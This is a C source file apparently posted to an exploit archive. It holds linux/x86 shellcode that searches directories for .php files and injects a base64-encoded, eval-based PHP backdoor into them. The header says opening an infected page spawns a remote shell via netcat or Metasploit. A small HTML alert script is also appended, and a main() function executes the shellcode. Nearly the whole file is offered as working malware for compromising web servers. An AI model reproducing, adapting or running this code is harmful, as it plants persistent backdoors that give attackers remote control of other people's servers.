/*
###
# Title : linux/x86 Search (*.php) and Inject PHP_BACKD00R exploit/shellcode
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns 
# platform : linux/x86
# Type : shellcode / local exploit
# Size : 380 bytes + Payload 204 bytes 
# Inf0 : afTer Inj3ct PHP backd00r Open any .php File ex:(index.php) and spawn BackShell via (NC/MSF)
###

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE  .. |
# | ------------------------------------------------- < |
###

*/

// Reference : http://1337day.com/exploits/17392 * by rigan

#include <stdio.h>

char shellcode[] =
   "\x31\xc0"        // xor %eax,%eax
   "\x50"            // push %eax
   "\x83\xec\x01"    // sub %esp,$0x1
   "\xc6\x04\x24\x2f"  // mov byte %esp, $0x2f
   "\x89\xe3"        // mov %ebx,%esp
   "\xb0\x0c"        // mov %al,$0x0c
   "\xcd\x80"        // int $0x80
   "\x31\xc0"        // xor %eax,%eax
   "\x50"            // push %eax
   "\x83\xec\x01"    // sub %esp,$0x01
   "\xc6\x04\x24\x2e"  // mov %esp, $0x2e
   "\xeb\x02"        // jmp short .me
   "\xeb\x63"        // jmp short .me
   "\xe8\xf9\xff\xff\xff"  // call .str - exit(0)
   "\x31\xc0"        // xor %eax,%eax
   "\x31\xdb"        // xor %ebx,%ebx
   "\xb0\x01"        // mov %al,$0x01
   "\xcd\x80"        // int $0x80
   "\x31\xc0"        // xor %eax,%eax
   "\x89\xfb"        // mov %ebx,%edi
   "\x31\xc9"        // xor %ecx,%ecx
   "\xb1\x02"        // mov %cl,$0x02
   "\xb0\x05"        // mov %al,$0x05
   "\xcd\x80"        // int $0x80
   "\x31\xdb"        // xor %ebx,%ebx
   "\x89\xc3"        // mov %ebx,%eax
   "\x31\xc9"        // xor %ecx,%ecx
   "\x31\xc0"        // xor %eax,%eax
   "\x99"            // cdq
   "\xb2\x02"        // mov %dl,$0x02
   "\xb0\x13"        // mov %al,$0x13
   "\xcd\x80"        // int $0x80
   "\x31\xc0"        // xor %eax,%eax
   "\x89\xf1"        // mov %ecx,%esi
   "\xb2\x32\x30\x34"  // mov %dl,$0x343032 [ Backd00r S!zE = 204 bytes ]
   "\xb0\x04"        // mov %al,$0x04
   "\xcd\x80"        // int $0x80
   "\x31\xc0"        // xor %eax,%eax
   "\xb0\x06"        // mov %al,$0x06
   "\xcd\x80"        // int $0x80
   "\xc3"            // retn
   "\x31\xc0"        // xor %eax,%eax
   "\x31\xdb"        // xor %ebx,%ebx
   "\x31\xc9"        // xor %ecx,%ecx
   "\x99"            // cdq
   "\x42"            // inc %edx
   "\x8a\x1c\x17"    // mov %bl, %edi, %edx
   "\x84\xdb"        // test %bl, %bl
   "\x74\x1a"        // je short .me
   "\x3a\x1e"        // cmp %bl, %esi
   "\x75\xf4"        // jnz short .me
   "\x8a\x04\x0e"    // mov %al, %esi, %ecx
   "\x8a\x1c\x17"    // mov %bl, %edi, %edx
   "\x84\xc0"        // test %al, %al
   "\x74\x08"        // je short .me
   "\x41"            // inc %ecx
   "\x42"            // inc %edx
   "\x38\xc3"        // cmp %bl, %al
   "\x74\xf0"        // je short .me
   "\xeb\x04"        // jmp short .me
   "\x31\xc0"        // xor %eax,%eax
   "\xb0\x02"        // mov %al,$0x02
   "\xc3"            // retn
   "\x55"            // push %ebp
   "\x89\xe5"        // mov %ebp,%esp
   "\xb0\xfa"        // mov %al,$0xfa
   "\x29\xc4"        // sub %esp,%eax
   "\x31\xc0"        // xor %eax,%eax
   "\x31\xc9"        // xor %ecx,%ecx
   "\x8d\x5d\x08"    // lea %ebx,dword %ebp ,$0x08
   "\xb0\x05"        // mov %al,$0x05
   "\xcd\x80"        // int $0x80
   "\x85\xc0"        // test %eax,%eax
   "\x78\x22"        // js short .me
   "\x89\x45\x0c"    // mov dword %ebp $0x0c,%eax
   "\x8b\x75\x0c"    // mov esi,dword %ebp $0x0c
   "\x89\xf3"        // mov %ebx,%esi
   "\x31\xc0"        // xor %eax,%eax
   "\x31\xc9"        // xor %ecx,%ecx
   "\x8d\x4c\x24\x64"  // lea %ecx,dword %esp $0x64
   "\xb0\x59"        // mov %al,$0x59
   "\xcd\x80"        // int $0x80
   "\x85\xc0"        // test %eax,%eax
   "\x75\x19"        // jnz short .me
   "\x31\xc0"        // xor %eax,%eax
   "\x31\xdb"        // xor %ebx,%ebx
   "\x89\xf3"        // mov %ebx,%esi
   "\xb0\x06"        // mov %al,$0x06
   "\xcd\x80"        // int $0x80
   "\x31\xc0"        // xor %eax,%eax
   "\x50"            // push %eax
   "\x66\x68\x2e\x2e" // push $0x2e2e
   "\x89\xe3"        // mov %ebx,%esp
   "\xb0\x0c"        // mov %al,$0x0c
   "\xcd\x80"        // int $0x80
   "\xc9"            // leave
   "\xc3"            // retn
   "\x8d\x54\x24\x6e"   // lea %edx,dword %esp $0x6e
   "\x81\x3a\x70\x72\x6f\x63"  // cmp dword %edx,$0x636f7270
   "\x74\xc6"        // je short .me
   "\x80\x3a\x2e"    // cmp %edx, $0x2e
   "\x75\x05"        // jnz short .me
   "\xe9\xbc\xff\xff\xff"  // jmp .str
   "\x89\xd3"        // mov %ebx,%edx
   "\x89\xe1"        // mov %ecx,%esp
   "\x31\xc0"        // xor %eax,%eax
   "\xb0\xc4"        // mov %al,$0xc4
   "\xcd\x80"        // int $0x80
   "\x66\xb9\xff\xef"  // mov %cx,$0xefff
   "\x66\xbb\xff\x9f"  // mov %bx,$0x9fff
   "\x41"            // inc %ecx
   "\x43"            // inc %ebx
   "\x8b\x44\x24\x10"  // mov %eax,dword %esp $0x10
   "\x66\x21\xc8"    // and %ax,%cx
   "\x66\x39\xd8"    // cmp %ax,%bx
   "\x75\x05"        // jnz short .me
   "\xe9\x97"        // jmp .me
   "\xff\xff\xff"    // .
   "\x31\xc0"        // xor %eax,%eax
   "\x50"            // push %eax
   "\x83\xec\xec"    // sub %esp,$0x14
   "\x01\xc6"        // add %esi,%eax
   "\x04\x24"        // add %al,$0x24
   "\x2e\x89\xd3"    // mov %ebx,%edx
   "\xb0\x0c"        // mov %al,$0x0c
   "\xcd\x80"        // int $0x80
   "\x85\xc0"        // test %eax,%eax
   "\x75\x0a"        // jnz short .me
   "\xe8\x65\xff\xff\xff"  // call .str
   "\xe9\x79\xff\xff\xff"  // jmp .str
   "\x31\xc0"        // xor %eax,%eax
   "\x89\xd3"        // mov %ebx,%edx
   "\x31\xc9"        // xor %ecx,%ecx
   "\xb1\x02"        // mov %cl,$0x02
   "\xb0\x21"        // mov %al,$0x21
   "\xcd\x80"        // int $0x80
   "\x85\xc0"        // test %eax,%eax
   "\x74\x05"        // je short .me
   "\xe9\x64\xff\xff\xff"  // jmp .str
   "\x3c\x02"        // cmp %al,$0x02
   "\x74\x18"        // je short .me
   "\x31\xc0"        // xor %eax,%eax
   "\x50"            // push %eax
   "\x68\x2e\x70\x68\x70"  // push $0x7068702e
   "\x89\xe6"        // mov %esi,%esp
   "\xe8\xf6\xfe\xff\xff"  // call .str
   "\x3c\x02"        // cmp %al,$0x02
   "\x74\x05"        // je short .me
   "\xe9\x30\xff\xff\xff"  // jmp .str
   "\xeb\x0b"        // jmp short .me
   "\x5e"            // pop %esi
   "\xe8\xb9\xfe\xff\xff"  // call .str
   "\xe9\x23\xff\xff\xff"  // jmp .str
   "\xe8\xf0\xff\xff\xff"  // call .str
   
   /* PHP Backd00r - Payload by MSF | enc=Base64 =>*/
  "\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63"
  "\x6f\x64\x65\x28\x4d\x63\x6b\x78\x32\x2e\x63\x68\x72\x28\x34"
  "\x37\x29\x2e\x66\x6a\x73\x4b\x54\x4e\x67\x44\x48\x4a\x4d\x64"
  "\x74\x71\x52\x6c\x6a\x4e\x67\x44\x48\x62\x61\x68\x64\x59\x7a"
  "\x59\x41\x78\x32\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x66\x6a"
  "\x55\x30\x4e\x54\x61\x67\x4b\x4a\x34\x62\x42\x6d\x7a\x59\x42"
  "\x62\x58\x6d\x68\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x41\x41"
  "\x41\x42\x5a\x6d\x67\x52\x58\x47\x5a\x54\x61\x68\x42\x52\x55"
  "\x49\x6e\x68\x51\x32\x70\x6d\x57\x4d\x32\x41\x57\x59\x66\x5a"
  "\x73\x44\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x4e\x67\x45\x6c"
  "\x35\x2e\x63\x68\x72\x28\x34\x33\x29\x2e\x56\x42\x6f\x4c\x79"
  "\x39\x7a\x61\x47\x67\x76\x59\x6d\x6c\x75\x69\x65\x4e\x51\x55"
  "\x34\x6e\x68\x73\x41\x76\x4e\x67\x41\x29\x29\x3b"
    /* End payload ...*/
   
   "\x3c\x68"        // cmp %al,$0x68
   "\x74\x6d"        // je short .me
   "\x6c"            // ins %edi,%dx
   "\x3e\x3c\x73"    // cmp %al,$0x73
   "\x63\x72\x69"    // arpl word %edx $0x69,%si
   "\x70\x74"        // jo short .me
   "\x3e\x61"        // popad
   "\x6c"            // ins %edi,%dx
   "\x65\x72\x74"    // jb short .me
   "\x28\x22"        // sub %edx,%ah
   "\x70\x77"        // jo short .me
   "\x6e"            // outs %dx,%edi
   "\x33\x64\x22\x29"  // xor %esp,dword %edx $0x29
   "\x3c\x73"        // cmp %al,$0x73
   "\x63\x72\x69"    // arpl word %edx $0x69,%si
   "\x70\x74"        // jo short .me
   "\x3e\x3c\x2f"    // cmp %al,$0x2f
   "\x68\x74\x6d\x6c\x3e";  // push $0x3e6c6d74

int main()
{  
  printf("%d\n", strlen(shellcode));
  (*(void (*)()) shellcode)();
  return 0;
}
